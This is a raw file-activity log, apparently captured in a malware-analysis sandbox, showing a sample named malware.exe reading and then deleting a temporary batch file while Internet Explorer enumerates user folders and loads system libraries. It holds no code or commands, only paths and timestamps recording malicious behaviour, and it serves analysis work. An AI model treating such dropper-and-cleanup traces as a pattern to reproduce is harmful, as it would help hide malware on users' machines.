11/3/2020 - 11:45:43.856Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.856Open1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.856Read1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.856Unknown1488C:\Windows\SysWOW64\cmd.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.872Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:43.872Open1480C:\malware.exeC:\Monitor\Files\DeletedFiles\nontinehhas.bat
11/3/2020 - 11:45:43.872Write1480C:\malware.exeC:\Monitor\Files\DeletedFiles\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.872Delete1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.872Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:43.872Open1480C:\malware.exeC:\Monitor\Malware
11/3/2020 - 11:45:43.872Unknown1480C:\malware.exeC:\Monitor
11/3/2020 - 11:45:43.872Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:43.872Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
11/3/2020 - 11:45:43.872Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pfIEXPLORE.EXE-908C99F8.pf
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exe\Device\HarddiskVolume2
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\$EXTEND
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\$EXTEND
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\$EXTEND
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\imagestore\iwbzmlt
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\WebCache
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\WebCache
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\WebCache
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Favorites
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Fonts
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ntdll.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\kernel32.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apisetschema.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\apisetschema.dllapisetschema.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\KernelBase.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\KernelBase.dllKernelBase.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\locale.nls
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\user32.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\gdi32.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\gdi32.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\lpk.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\lpk.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\usp10.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\usp10.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msvcrt.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msvcrt.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dllapi-ms-win-downlevel-advapi32-l1-1-0.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\advapi32.dll
11/3/2020 - 11:45:43.872Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\advapi32.dll
11/3/2020 - 11:45:43.872Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sechost.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sechost.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcrt4.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcrt4.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\shell32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\shell32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\shlwapi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\shlwapi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\iertutil.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\iertutil.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dllapi-ms-win-downlevel-version-l1-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\version.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\version.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dllapi-ms-win-downlevel-user32-l1-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dllapi-ms-win-downlevel-normaliz-l1-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\normaliz.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\normaliz.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dllapi-ms-win-downlevel-shlwapi-l1-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\imm32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msctf.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\msctf.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptbase.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\cryptbase.dllcryptbase.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nls
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\Globalization\Sorting\SortDefault.nlsSortDefault.nls
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieframe.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ieframe.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ole32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ole32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaut32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\oleaut32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.Manifest
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\IEShims.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\comdlg32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\comdlg32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcss.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\rpcss.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\uxtheme.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\uxtheme.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\urlmon.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\urlmon.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dllapi-ms-win-downlevel-ole32-l1-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wininet.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\wininet.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\userenv.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\userenv.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\profapi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\profapi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dwmapi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\dwmapi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\sqmapi.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\secur32.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\secur32.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sspicli.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\sspicli.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:43.887Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:43.887Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
